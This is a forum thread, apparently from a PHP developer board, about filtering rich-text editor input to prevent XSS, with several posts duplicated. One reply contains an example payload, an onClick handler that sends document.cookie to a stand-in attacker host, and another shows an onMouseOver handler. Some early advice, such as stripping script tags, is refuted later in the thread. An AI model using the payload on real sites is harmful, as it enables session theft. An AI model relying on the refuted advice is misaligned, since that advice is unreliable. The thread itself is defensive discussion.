Rich text editing
Moderator: General Moderators
Rich text editing
If I have an extremely simple editing system (think blog, with little structure), and I add a rich text editor (such as FCKeditor), what general steps do I need to ensure security?
I'm presuming something like:
- Rich text editor for input
- Filter input (To remove what? How?)
- Add escaping for storage to DB
- Store to DB
- Pull from DB
- Escape output (To remove what? How?)
- Present output to user
The bolded items are the ones I am unclear on the specifics for, and would appreciate guidance. If we are allowing users to enter *rich text*, which includes html codes, I'm very unclear on the full range of items we need to filter to ensure no XSS, js attacks, and so forth.
I'm also unclear on the specifics of what you would escape in the output. By definition, we want html to come through, so what would we be htmlentities escaping?
Any specific guidance on these general concepts is appreciated. While I'm strong on security in other areas, these two items in this specific scenario is something I've always avoided as being too risky, but I can no longer do so.
Any pre-packaged solutions for any of the above steps is also welcome. By way of example, I'll be using adodb for the escaping for storage, and CRUD events. The solutions would need to be GPL-compatible.
Please be gentle. I know that I am normally one of the first people answering these types of questions, but this is an area where I am less confident, and I would appreciate the knowledge and understanding of the community to help me improve.
I'm presuming something like:
- Rich text editor for input
- Filter input (To remove what? How?)
- Add escaping for storage to DB
- Store to DB
- Pull from DB
- Escape output (To remove what? How?)
- Present output to user
The bolded items are the ones I am unclear on the specifics for, and would appreciate guidance. If we are allowing users to enter *rich text*, which includes html codes, I'm very unclear on the full range of items we need to filter to ensure no XSS, js attacks, and so forth.
I'm also unclear on the specifics of what you would escape in the output. By definition, we want html to come through, so what would we be htmlentities escaping?
Any specific guidance on these general concepts is appreciated. While I'm strong on security in other areas, these two items in this specific scenario is something I've always avoided as being too risky, but I can no longer do so.
Any pre-packaged solutions for any of the above steps is also welcome. By way of example, I'll be using adodb for the escaping for storage, and CRUD events. The solutions would need to be GPL-compatible.
Please be gentle. I know that I am normally one of the first people answering these types of questions, but this is an area where I am less confident, and I would appreciate the knowledge and understanding of the community to help me improve.
I can't give you an all-encompassing security resolution but I can start you off with this:
by default RTE's will automatically already be 'htmlentitied".
In other words, if I type in <script> in my RTE, it's going to interpret the "<" as < etc.
the way I've done it in the past is to use innerHTML of the element (usually an iframe) and copy that info to a hidden form var, then on post take the value of that form var and dump it into my db.
you'll still want to run it through mysql_real_escape_string() but other than that, I haven't run into any issues.
by default RTE's will automatically already be 'htmlentitied".
In other words, if I type in <script> in my RTE, it's going to interpret the "<" as < etc.
the way I've done it in the past is to use innerHTML of the element (usually an iframe) and copy that info to a hidden form var, then on post take the value of that form var and dump it into my db.
you'll still want to run it through mysql_real_escape_string() but other than that, I haven't run into any issues.
The dangers in the input & output are possible execution of code, and broken xhtml code.
fckEditor (and most other RTEs) allow you to edit the source code directly. It's easy then, to post broken code which breaks your displaying web page. Perhaps writing a parser or somehow using a command line version of htmlTidy could at least tell you if the xhtml code is malformed.
As for stopping PHP code from being executed - that's easy. Just don't ever handle that string in such a way as to be executed.
Javascript may be a little more difficult. Inline javascript will, of course, have to be put inside <script></script> tags - so you could just parse the input and strip out those tags and anything they contain.
fckEditor (and most other RTEs) allow you to edit the source code directly. It's easy then, to post broken code which breaks your displaying web page. Perhaps writing a parser or somehow using a command line version of htmlTidy could at least tell you if the xhtml code is malformed.
As for stopping PHP code from being executed - that's easy. Just don't ever handle that string in such a way as to be executed.
Javascript may be a little more difficult. Inline javascript will, of course, have to be put inside <script></script> tags - so you could just parse the input and strip out those tags and anything they contain.
Real programmers don't comment their code. If it was hard to write, it should be hard to understand.
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
Mmm... as of the market stands now, no pure-PHP solution is satisfactory, mainly because they don't really "know" about the HTML specification. I've been working on something that does, and let me tell you, it's not easy.
The "best" way to do it would be to...
1. Lex the HTML fragment according to the SGML standard into tokens (MarkupLexer, finished that)
2. Take tokens and pass them through a DTD, which knows about the specification and can check for many things:
* Proper nesting (not just "do all elements close" but "did they try to put a block level element in an inline one"?)
* Proper attribute formats (at least a dozen RFCs for each including URLs and CSS)
3. Recompile the tokens into HTML
4. Run a gauntlet of compatibility checks, attempting to eliminate any possible browser quirks that cause non-standard behavior and could compromise insecure browsers (esp. IE, this happens ALOT)
5. If changes where made, re-rinse, until the HTML stops changing
Of course, no one in their right mind would do it (except me). But any other solution is unsatisfactory. This is the main reason why forums use BBcode, and why most systems that actually have HTML parsing don't do it completely correctly, and are hideously complex.
(I believe I've harped about this in a previous thread already, but I can't remember what it was)
The "best" way to do it would be to...
1. Lex the HTML fragment according to the SGML standard into tokens (MarkupLexer, finished that)
2. Take tokens and pass them through a DTD, which knows about the specification and can check for many things:
* Proper nesting (not just "do all elements close" but "did they try to put a block level element in an inline one"?)
* Proper attribute formats (at least a dozen RFCs for each including URLs and CSS)
3. Recompile the tokens into HTML
4. Run a gauntlet of compatibility checks, attempting to eliminate any possible browser quirks that cause non-standard behavior and could compromise insecure browsers (esp. IE, this happens ALOT)
5. If changes where made, re-rinse, until the HTML stops changing
Of course, no one in their right mind would do it (except me). But any other solution is unsatisfactory. This is the main reason why forums use BBcode, and why most systems that actually have HTML parsing don't do it completely correctly, and are hideously complex.
(I believe I've harped about this in a previous thread already, but I can't remember what it was)
and if I telnet in and type <script> in my POST data its not going to escape anythingBurrito wrote: if I type in <script> in my RTE, it's going to interpret the "<" as < etc.
What aboutpickle wrote: Inline javascript will, of course, have to be put inside <script></script> tags
Code: Select all
<p onMouseOver="armagedon(); return false;"></p>I would personally say use a "fuzzy" whitelist, using preg
if the rich text is allowing bold italics underline and colors for example you can match against each one in turn
Code: Select all
preg_match('@<span style="color:#?([a-zA-Z0-9]+)?;" >([a-zA-Z0-9]+)</span>@');- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
armagedon() will still have to be declared withing <script></script> tags. The worst that'll do (unless Roja defines a function armagedon()) is generate a script error....I think.jshpro2 wrote: What aboutCode: Select all
<p onMouseOver="armagedon(); return false;"></p>
Or things along those lines?
Real programmers don't comment their code. If it was hard to write, it should be hard to understand.
That's an example. instead of calling that function you can put javascript right in there, here's a different example though:
no <script> tags needed
Code: Select all
<a href="#" onClick="window.location.href='http://cookiestealer.com/script.php?ssid='+document.cookie">free beer click here</a>no <script> tags needed
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
How much HTML do you want to allow? For simple things, I find it easiest to escape everything and then convert allowed entities back to their original form. This also lets you make sure the user has closed bold tags and things of that nature.
For more complex needs, you might find this helpful:
http://cyberai.com/inputfilter/
It lets you take a whitelist or blacklist approach with both tags and attributes, and it also has an option to automatically remove common problems.
For more complex needs, you might find this helpful:
http://cyberai.com/inputfilter/
It lets you take a whitelist or blacklist approach with both tags and attributes, and it also has an option to automatically remove common problems.
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
Note that inputfilter isn't perfect, and if you make it too permissive, it will let malicious output through (only because it doesn't actually know about the specification), although at the very least it will cause your document to stop validating (eg. it doesn't check proper nesting of blocks and inlines).